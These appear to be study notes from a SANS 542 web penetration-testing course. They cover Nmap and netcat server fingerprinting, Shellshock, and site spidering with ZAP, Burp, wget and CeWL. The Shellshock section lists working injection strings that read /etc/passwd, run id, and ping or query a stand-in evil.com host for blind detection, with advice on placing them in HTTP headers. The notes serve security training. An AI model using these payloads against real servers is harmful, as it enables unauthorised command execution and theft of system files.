Sans 542
Sans 542
Sans 542
2.1: Nmap
2.1.1: NSE, -O (operating system) and -sV (service version) detection
2.1.2: example of scanning scanme.nmap.org
2.1.3: Server profiling: find out version of web server, ssl, load balancing, etc.
2.1.4: Finding server version through different methods
2.1.5: Nmap, use -sV
2.1.6: Use netcat to get server connection strings, http headers
2.1.7: Netcat example of true and false server headers
2.1.8: Look up website on Netcraft
2.1.9: More in depth detail from Netcraft: headers, netblock info, ownership info
2.4: Shellshock
2.4.1: Important to look for software configuration flaws,using e.g. Nikto
2.4.2: 2014 a good year for vulns, heartbleed, shellshock and drupalgeddon
2.4.3: Shellshock due to the way Bash handled functions defined within environment
variables and exported to child process, which would import them and run arbitrary
commands.
2.4.4: Remotely exploitable: adversary interacts with server, input from connection
used by server in bash env variables, adversary controls input and makes commands
to be executed.
2.4.5: On the web, CGI scripts can use #!/bin/bash, and often /bin/sh is a pointer
to /bin/bash. Also functions backed by popen() or system() also vulnerable in apps
written in Python, PHP and other interpreted languages.
2.4.6: Injection strings (first two injection, second two blind injection):
() { 42;};echo;/bin/cat /etc/passwd
() { 42;};echo;/usr/bin/id
() { 42;};echo; ping -c 4 10.42.42.42
() { 42;};echo; nslookup abc123.evil.com
2.4.7: This can go in user-agents, cookies, referer entries. The () { 42;} prefix
indicates a function stored in an env variable. Inside the curly braces is what the
function will do, 42 is arbitrary here as it doesn't get executed (can just be
colon in there). The echo is padding - not always necessary for shellshock but for
HTTP headers it reduces likelihood of server error. The last part is the command.
2.4.8: Bash continues parsing past the ;} and executes what it finds (this is the
flaw)
2.4.9: Visualisation of shellshock injection
2.5: Exercise: Shellshock, using burp to intercept and change user-agent string.
Also use curl to set user-agent.
2.6: Spidering web applications.
2.6.1: Spidering is important info gathering according to OTG
2.6.2: Involves following links to download the site, offline analyse to find
security weaknesses in code, contact details, keywords for password guessing,
confidential data etc.
2.6.3: Common to spider multiple times as you need a map of the site. Automated
tools may failis site is complex or has issues with multiple requests, so might
have to do it manually.
2.6.4: Robots.txt can tell spiders what they're allowed to acces based on user-
agent. Meta tags can also be placed on pages: First two to stop caching (need both
as respected by different clients), second two to control search engine spiders.
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta name="robots" content="index,nofollow">
<meta name="googlebot" content="noarchive">
2.6.5: ZAP can spider websites (select attack->spider). Client side dynamically
generated links can be missed, so a separate dedicated AJAX spider can be employed.
2.6.6: ZAP example.
2.6.7: Wappalyzer can provide insight into OS, web server, web apps, languages,
frameworks and APIs leveraged.
2.6.8: Wappalyzer browser extension gives icons of what stuff is in use. Beware, it
sends data back to wappalyzer website.
2.6.9: ZAP has a "Technology Detection" extension that implements Wappalyzer code
but it's not release quality and doesn't implement all functionality as browser is
required.
2.6.10: It's a marketplace extension and creates a new tab. Example illustrated.
2.6.11: ZAP forced browse, based on (now inactive) DirBuster, does a brute force
browse using wordlist. Can do it for a site, a directory or directory + its
children.
2.6.12: Burp can spider similar to ZAP, use spider tab+"spider running" or right
click target and click "spider this host"
2.6.13: Can use wget: respects robots.txt, -r will recurse through discovered links
and -l can set recursion depth
2.6.14: Specialized spidering tools are available, CeWL (https://digi.ninja)
spiders then creates a word list for dictionary attack, uses EXIF data.